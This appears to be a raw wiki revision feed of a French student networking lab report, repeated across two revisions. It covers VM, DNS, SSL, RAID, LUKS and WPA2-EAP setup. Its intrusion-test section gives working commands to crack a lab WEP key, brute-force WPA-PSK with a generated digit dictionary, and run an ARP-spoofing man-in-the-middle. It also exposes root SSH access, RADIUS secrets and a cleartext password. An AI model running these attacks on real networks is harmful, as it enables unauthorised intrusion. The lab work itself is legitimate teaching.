ssh root@193.48.57.186 -p 2222&lt;br /&gt;
&lt;br /&gt;
=== DNS ===&lt;br /&gt;
Ajout DNS :&lt;br /&gt;
&lt;br /&gt;
- le faire dans gandi&lt;br /&gt;
- modifier fichier /etc/bind/named.conf.local en ajoutant :&lt;br /&gt;
 zone &amp;quot;clavaire.site&amp;quot; IN {&lt;br /&gt;
 	type master;&lt;br /&gt;
 	file &amp;quot;/etc/bind/db.clavaire.lan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- puis avoir un ficher db.clavaire.lan :&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.clavaire.site. admin.clavaire.site. (&lt;br /&gt;
                               8         ; Serial&lt;br /&gt;
                          604800         ; Refresh&lt;br /&gt;
                           86400         ; Retry&lt;br /&gt;
                         2419200         ; Expire&lt;br /&gt;
                          604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.clavaire.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      100 clavaire.site.&lt;br /&gt;
 ns1     IN      A       193.48.57.186&lt;br /&gt;
 www     IN      A       193.48.57.186&lt;br /&gt;
         IN      AAAA    [ipv6]&lt;br /&gt;
&lt;br /&gt;
- relancer bind : &lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
- pour vérifier :&lt;br /&gt;
 host -tany clavaire.site&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation site web par certificat ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé un serveur apache2,&lt;br /&gt;
&lt;br /&gt;
 systemctl start apache2&lt;br /&gt;
&lt;br /&gt;
Nous avons ajouté à la liste des ports, le module ssl en écoute sur le port 443&lt;br /&gt;
&lt;br /&gt;
Ajout du certificat SSL&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous avons installé openssl puis nous avons créé une nouvelle clé &lt;br /&gt;
&lt;br /&gt;
 La commande est disponible par mail: simoninrichard@gmail.com&lt;br /&gt;
 &lt;br /&gt;
Nous avons deplacé la clé dans private puis nous avons donné la clé public à Gandi pour générer le fichier&lt;br /&gt;
&lt;br /&gt;
Pour la sécurisation SSl, nous avons utilisé le un serveur mail sur notre VM, mailx.&lt;br /&gt;
&lt;br /&gt;
Pour notre serveur mail, nous avons configuré un chemin de sauvegarde de mail Maildir/, qui ne correspond pas au chemin courant.&lt;br /&gt;
&lt;br /&gt;
 mailx -f Maildir/&lt;br /&gt;
&lt;br /&gt;
Nous avons aussi ajouté un alias afin de recéptionner les mails en admin et non en root.&lt;br /&gt;
&lt;br /&gt;
A l'aide du serveur mail, nous avons pu valider les différentes etapes de validation SSL&lt;br /&gt;
&lt;br /&gt;
Nous devons ensuite activer nos certificats SSL&lt;br /&gt;
&lt;br /&gt;
 a2enmod ssl&lt;br /&gt;
&lt;br /&gt;
Ensuite nous avons modifié notre fichier de conf de notre site: clavaire.site.conf, pour ajouté nos chemins de fichiers de certificat SSL.&lt;br /&gt;
&lt;br /&gt;
Puis un petit restart et notre site est sécurisé.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de serveur DNS par DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
Nous avons suivi les différentes étapes du sujet de TP. Nous avons choisis comme nom de zone: clavaire.site.&lt;br /&gt;
&lt;br /&gt;
Nous avons vérifié le bon fonctionnement à l'aide de :&lt;br /&gt;
&lt;br /&gt;
 https://dnsviz.net/d/clavaire.site/dnssec/&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Nous obtenons ainsi l'interface de la clé WI-PI.&lt;br /&gt;
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518 3&lt;br /&gt;
&lt;br /&gt;
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap &lt;br /&gt;
&lt;br /&gt;
et nous obtenons notre clé pour la cracotte03&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons du trouvé le reseau wifi à cracker en scannant le reseau.&lt;br /&gt;
&lt;br /&gt;
Nous avons pu ainsi attendre une connexion sur le reseau pour récupérer un Handshake grace à airdump.&lt;br /&gt;
&lt;br /&gt;
Une fois les fichiers acquis, nous avons lancé sur un PC fixe plus puissant, la commande de crack par brute force.&lt;br /&gt;
&lt;br /&gt;
aircrack-ng -w fichierbruteforce.txt -b 00:24:0A:F2:C0:18 psk*.cap&lt;br /&gt;
&lt;br /&gt;
Code c pour générer le dictionnaire :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     FILE *f;&lt;br /&gt;
     f = fopen(&amp;quot;fichierbruteforce.txt&amp;quot;,&amp;quot;w&amp;quot;);&lt;br /&gt;
     if(f==NULL){&lt;br /&gt;
         printf(&amp;quot;Erreur lors de l'ouverture c'un fichier&amp;quot;);&lt;br /&gt;
         exit(1);&lt;br /&gt;
     }&lt;br /&gt;
 &lt;br /&gt;
     for(char a=0; a&amp;lt;10;a++)&lt;br /&gt;
     {&lt;br /&gt;
         for(char z=0; z&amp;lt;10;z++)&lt;br /&gt;
         {&lt;br /&gt;
             for(char e=0; e&amp;lt;10;e++)&lt;br /&gt;
             {&lt;br /&gt;
                 for(char r=0; r&amp;lt;10;r++)&lt;br /&gt;
                 {&lt;br /&gt;
                     for(char t=0; t&amp;lt;10;t++)&lt;br /&gt;
                     {&lt;br /&gt;
                         for(char y=0; y&amp;lt;10;y++)&lt;br /&gt;
                         {&lt;br /&gt;
                             for(char u=0; u&amp;lt;10;u++)&lt;br /&gt;
                             {&lt;br /&gt;
                                 for(char i=0; i&amp;lt;10;i++)&lt;br /&gt;
                                 {&lt;br /&gt;
                                     //printf(&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                     fprintf(f,&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                 }&lt;br /&gt;
                             }&lt;br /&gt;
                         }&lt;br /&gt;
                     }&lt;br /&gt;
                 }&lt;br /&gt;
             }&lt;br /&gt;
         }&lt;br /&gt;
     }&lt;br /&gt;
     fclose(f);&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP ===&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette manipulation est de nous faire passer pour un utilisateur de notre reseau au près d'un serveur web.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous devons modifier la valeur de la variable pour passer en mode routeur,&lt;br /&gt;
&lt;br /&gt;
 sysctl -w net.ipv4.ip_forward=1&lt;br /&gt;
&lt;br /&gt;
Nous commencons ainsi le piratage,&lt;br /&gt;
&lt;br /&gt;
attacker@attacker:~/ arpspoof -i enp0s3 -t 192.168.1.74 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Réalisations ==&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
&lt;br /&gt;
On crée 3 disques virtuel de 1G (lvcreate -L1G -nclavaire-raid1 storage) et on les ajoute au fichier de config.&lt;br /&gt;
On peut créer le raid :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Pour qu'il soit monté a chaque démarrage de la vm : &lt;br /&gt;
 mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
Et on l'ajoute au fichier /etc/fstab&lt;br /&gt;
&lt;br /&gt;
Avec des fichiers dans le ce volume, meme si un disque est déconnecté, les données sont toujours disponible.&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:&lt;br /&gt;
&lt;br /&gt;
 df -h&lt;br /&gt;
&lt;br /&gt;
Nous connaissons ainsi notre Filesystem:&lt;br /&gt;
&lt;br /&gt;
 fdisk /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons fdisk mais nous devons exécuter la commande&lt;br /&gt;
&lt;br /&gt;
 partprobe &lt;br /&gt;
&lt;br /&gt;
Pour re-écrire dans la table de partition.&lt;br /&gt;
&lt;br /&gt;
Nous commençons l'initialisations de notre clé cryptée &lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksFormat  /dev/sdb1&lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksOpen /dev/sdb1 home&lt;br /&gt;
&lt;br /&gt;
Nous pouvons accéder à notre clé depuis &lt;br /&gt;
&lt;br /&gt;
 cd /media/pifou/665....62/&lt;br /&gt;
&lt;br /&gt;
Nous avons créé un fichier test en sudo à la racine.&lt;br /&gt;
 &lt;br /&gt;
 sudo cryptsetup luksClose home &lt;br /&gt;
&lt;br /&gt;
Cette commande permet de fermer notre clé cryptée.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation WiFi par WPA2-EAP ===&lt;br /&gt;
&lt;br /&gt;
==== Configuration borne wifi ====&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# aaa authentication login eap_group3 group radius_group3&lt;br /&gt;
 wifi-ima5sc(config)# radius-server host 193.48.57.186 auth-port 1812 acct-port 1813 key secret_group3&lt;br /&gt;
 wifi-ima5sc(config)# aaa group server radius radius_group3&lt;br /&gt;
 wifi-ima5sc(config-server)# server 193.48.57.186 auth-port 1812 acct-port 1813&lt;br /&gt;
 wifi-ima5sc(config-server)#exit&lt;br /&gt;
 wifi-ima5sc(config)# dot11 ssid SSID_GROUP3&lt;br /&gt;
 wifi-ima5sc(config-ssid)# mbssid guest-mode&lt;br /&gt;
 wifi-ima5sc(config-ssid)# vlan 303&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication open eap eap_group3&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication network-eap eap_group3&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication key-management wpa&lt;br /&gt;
 wifi-ima5sc(config-ssid)#exit&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# int Dot11Radio0&lt;br /&gt;
 wifi-ima5sc(config-if)# encryption vlan 303 mode ciphers aes-ccm tkip&lt;br /&gt;
 wifi-ima5sc(config-if)# mbssid&lt;br /&gt;
 wifi-ima5sc(config-if)#exit&lt;br /&gt;
 wifi-ima5sc(config)# ssid SSID_GROUP3&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# int dot11radio0.3&lt;br /&gt;
 wifi-ima5sc(config-subif)# encapsulation dot1q 303&lt;br /&gt;
 wifi-ima5sc(config-subif)# bridge-group 3&lt;br /&gt;
 wifi-ima5sc(config-subif)#exit&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# int Gi0.3&lt;br /&gt;
 wifi-ima5sc(config-subif)# encapsulation dot1q 303&lt;br /&gt;
 wifi-ima5sc(config-subif)# bridge-group 3&lt;br /&gt;
 wifi-ima5sc(config-subif)#exit&lt;br /&gt;
 wifi-ima5sc(config)#exit&lt;br /&gt;
 wifi-ima5sc# write&lt;br /&gt;
&lt;br /&gt;
Nous avons configuré notre routeur wifi à l'aide de notre Vlan.&lt;br /&gt;
&lt;br /&gt;
==== Installation freeRadius ====&lt;br /&gt;
&lt;br /&gt;
 Sudo apt install freeradius&lt;br /&gt;
&lt;br /&gt;
dans le fichier&lt;br /&gt;
 /etc/freeradius/3.0/users&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons une ligne dans le but d'ajouter un utilisateur&lt;br /&gt;
 pifou Cleartext-Password := &amp;quot;pasglop&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &lt;br /&gt;
  /etc/freeradius/3.0/client.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons ce paragraphe pour ajouter l'adresse IP du routeur.&lt;br /&gt;
&lt;br /&gt;
 client pra_wifi {&lt;br /&gt;
    ipaddr = 10.60.100.10&lt;br /&gt;
    secret = secret_group14 }&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[https://www.clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Tmertz</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54771</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54771"/>
				<updated>2020-12-16T13:09:25Z</updated>
		
		<summary type="html">&lt;p&gt;Tmertz : /* DNS */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.186/28&lt;br /&gt;
 URL : www.clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
 Rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
 &lt;br /&gt;
 Modif .cfg pour ajouter disques&lt;br /&gt;
 &lt;br /&gt;
 Transfert fichier /var vers nouvelle partition&lt;br /&gt;
 &lt;br /&gt;
 Ajoute au /etc/fstab les disques&lt;br /&gt;
 &lt;br /&gt;
 Mount -a&lt;br /&gt;
&lt;br /&gt;
== Routage du site IPv4 ==&lt;br /&gt;
&lt;br /&gt;
Dans VM : /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.186&lt;br /&gt;
 netmask 255.255.255.255&lt;br /&gt;
 up ip address add dev eth0 100.64.0.26/24&lt;br /&gt;
 up ip route add default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
 down ip address del dev eth0 100.64.0.26/24&lt;br /&gt;
 down ip route del default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
Dans gateway&lt;br /&gt;
&lt;br /&gt;
1. ssh zabeth09 et zabeth30&lt;br /&gt;
&lt;br /&gt;
2. minicom -&amp;gt; /dev/ttyACM0 et /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
3. enable&lt;br /&gt;
&lt;br /&gt;
4. conf t&lt;br /&gt;
&lt;br /&gt;
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26&lt;br /&gt;
&lt;br /&gt;
6. exit&lt;br /&gt;
&lt;br /&gt;
7. write&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== SSH ===&lt;br /&gt;
modif /etc/ssh/sshd_config :&lt;br /&gt;
&lt;br /&gt;
 Changement port : PORT 2222&lt;br /&gt;
 Login depuis root : PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
service ssh restart&lt;br /&gt;
&lt;br /&gt;
on peut donc :&lt;br /&gt;
ssh root@193.48.57.186 -p 2222&lt;br /&gt;
&lt;br /&gt;
=== DNS ===&lt;br /&gt;
Ajout DNS :&lt;br /&gt;
&lt;br /&gt;
- le faire dans gandi&lt;br /&gt;
- modifier fichier /etc/bind/named.conf.local en ajoutant :&lt;br /&gt;
 zone &amp;quot;clavaire.site&amp;quot; IN {&lt;br /&gt;
 	type master;&lt;br /&gt;
 	file &amp;quot;/etc/bind/db.clavaire.lan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- puis avoir un ficher db.clavaire.lan :&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.clavaire.site. admin.clavaire.site. (&lt;br /&gt;
                               8         ; Serial&lt;br /&gt;
                          604800         ; Refresh&lt;br /&gt;
                           86400         ; Retry&lt;br /&gt;
                         2419200         ; Expire&lt;br /&gt;
                          604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.clavaire.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      100 clavaire.site.&lt;br /&gt;
 ns1     IN      A       193.48.57.186&lt;br /&gt;
 www     IN      A       193.48.57.186&lt;br /&gt;
         IN      AAAA    [ipv6]&lt;br /&gt;
&lt;br /&gt;
- relancer bind : &lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
- pour vérifier :&lt;br /&gt;
 host -tany clavaire.site&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation site web par certificat ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé un serveur apache2,&lt;br /&gt;
&lt;br /&gt;
 systemctl start apache2&lt;br /&gt;
&lt;br /&gt;
Nous avons ajouté à la liste des ports, le module ssl en écoute sur le port 443&lt;br /&gt;
&lt;br /&gt;
Ajout du certificat SSL&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous avons installé openssl puis nous avons créé une nouvelle clé &lt;br /&gt;
&lt;br /&gt;
 La commande est disponible par mail: simoninrichard@gmail.com&lt;br /&gt;
 &lt;br /&gt;
Nous avons deplacé la clé dans private puis nous avons donné la clé public à Gandi pour générer le fichier&lt;br /&gt;
&lt;br /&gt;
Pour la sécurisation SSl, nous avons utilisé le un serveur mail sur notre VM, mailx.&lt;br /&gt;
&lt;br /&gt;
Pour notre serveur mail, nous avons configuré un chemin de sauvegarde de mail Maildir/, qui ne correspond pas au chemin courant.&lt;br /&gt;
&lt;br /&gt;
 mailx -f Maildir/&lt;br /&gt;
&lt;br /&gt;
Nous avons aussi ajouté un alias afin de recéptionner les mails en admin et non en root.&lt;br /&gt;
&lt;br /&gt;
A l'aide du serveur mail, nous avons pu valider les différentes etapes de validation SSL&lt;br /&gt;
&lt;br /&gt;
Nous devons ensuite activer nos certificats SSL&lt;br /&gt;
&lt;br /&gt;
 a2enmod ssl&lt;br /&gt;
&lt;br /&gt;
Ensuite nous avons modifié notre fichier de conf de notre site: clavaire.site.conf, pour ajouté nos chemins de fichiers de certificat SSL.&lt;br /&gt;
&lt;br /&gt;
Puis un petit restart et notre site est sécurisé.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de serveur DNS par DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
Nous avons suivi les différentes étapes du sujet de TP. Nous avons choisis comme nom de zone: clavaire.site.&lt;br /&gt;
&lt;br /&gt;
Nous avons vérifié le bon fonctionnement à l'aide de :&lt;br /&gt;
&lt;br /&gt;
 https://dnsviz.net/d/clavaire.site/dnssec/&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Nous obtenons ainsi l'interface de la clé WI-PI.&lt;br /&gt;
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518 3&lt;br /&gt;
&lt;br /&gt;
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap &lt;br /&gt;
&lt;br /&gt;
et nous obtenons notre clé pour la cracotte03&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons du trouvé le reseau wifi à cracker en scannant le reseau.&lt;br /&gt;
&lt;br /&gt;
Nous avons pu ainsi attendre une connexion sur le reseau pour récupérer un Handshake grace à airdump.&lt;br /&gt;
&lt;br /&gt;
Une fois les fichiers acquis, nous avons lancé sur un PC fixe plus puissant, la commande de crack par brute force.&lt;br /&gt;
&lt;br /&gt;
aircrack-ng -w fichierbruteforce.txt -b 00:24:0A:F2:C0:18 psk*.cap&lt;br /&gt;
&lt;br /&gt;
Code c pour générer le dictionnaire :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     FILE *f;&lt;br /&gt;
     f = fopen(&amp;quot;fichierbruteforce.txt&amp;quot;,&amp;quot;w&amp;quot;);&lt;br /&gt;
     if(f==NULL){&lt;br /&gt;
         printf(&amp;quot;Erreur lors de l'ouverture c'un fichier&amp;quot;);&lt;br /&gt;
         exit(1);&lt;br /&gt;
     }&lt;br /&gt;
 &lt;br /&gt;
     for(char a=0; a&amp;lt;10;a++)&lt;br /&gt;
     {&lt;br /&gt;
         for(char z=0; z&amp;lt;10;z++)&lt;br /&gt;
         {&lt;br /&gt;
             for(char e=0; e&amp;lt;10;e++)&lt;br /&gt;
             {&lt;br /&gt;
                 for(char r=0; r&amp;lt;10;r++)&lt;br /&gt;
                 {&lt;br /&gt;
                     for(char t=0; t&amp;lt;10;t++)&lt;br /&gt;
                     {&lt;br /&gt;
                         for(char y=0; y&amp;lt;10;y++)&lt;br /&gt;
                         {&lt;br /&gt;
                             for(char u=0; u&amp;lt;10;u++)&lt;br /&gt;
                             {&lt;br /&gt;
                                 for(char i=0; i&amp;lt;10;i++)&lt;br /&gt;
                                 {&lt;br /&gt;
                                     //printf(&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                     fprintf(f,&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                 }&lt;br /&gt;
                             }&lt;br /&gt;
                         }&lt;br /&gt;
                     }&lt;br /&gt;
                 }&lt;br /&gt;
             }&lt;br /&gt;
         }&lt;br /&gt;
     }&lt;br /&gt;
     fclose(f);&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP ===&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette manipulation est de nous faire passer pour un utilisateur de notre reseau au près d'un serveur web.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous devons modifier la valeur de la variable pour passer en mode routeur,&lt;br /&gt;
&lt;br /&gt;
 sysctl -w net.ipv4.ip_forward=1&lt;br /&gt;
&lt;br /&gt;
Nous commencons ainsi le piratage,&lt;br /&gt;
&lt;br /&gt;
attacker@attacker:~/ arpspoof -i enp0s3 -t 192.168.1.74 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Réalisations ==&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
&lt;br /&gt;
On crée 3 disques virtuel de 1G (lvcreate -L1G -nclavaire-raid1 storage) et on les ajoute au fichier de config.&lt;br /&gt;
On peut créer le raid :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Pour qu'il soit monté a chaque démarrage de la vm : &lt;br /&gt;
 mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
Et on l'ajoute au fichier /etc/fstab&lt;br /&gt;
&lt;br /&gt;
Avec des fichiers dans le ce volume, meme si un disque est déconnecté, les données sont toujours disponible.&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:&lt;br /&gt;
&lt;br /&gt;
 df -h&lt;br /&gt;
&lt;br /&gt;
Nous connaissons ainsi notre Filesystem:&lt;br /&gt;
&lt;br /&gt;
 fdisk /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons fdisk mais nous devons exécuter la commande&lt;br /&gt;
&lt;br /&gt;
 partprobe &lt;br /&gt;
&lt;br /&gt;
Pour re-écrire dans la table de partition.&lt;br /&gt;
&lt;br /&gt;
Nous commençons l'initialisations de notre clé cryptée &lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksFormat  /dev/sdb1&lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksOpen /dev/sdb1 home&lt;br /&gt;
&lt;br /&gt;
Nous pouvons accéder à notre clé depuis &lt;br /&gt;
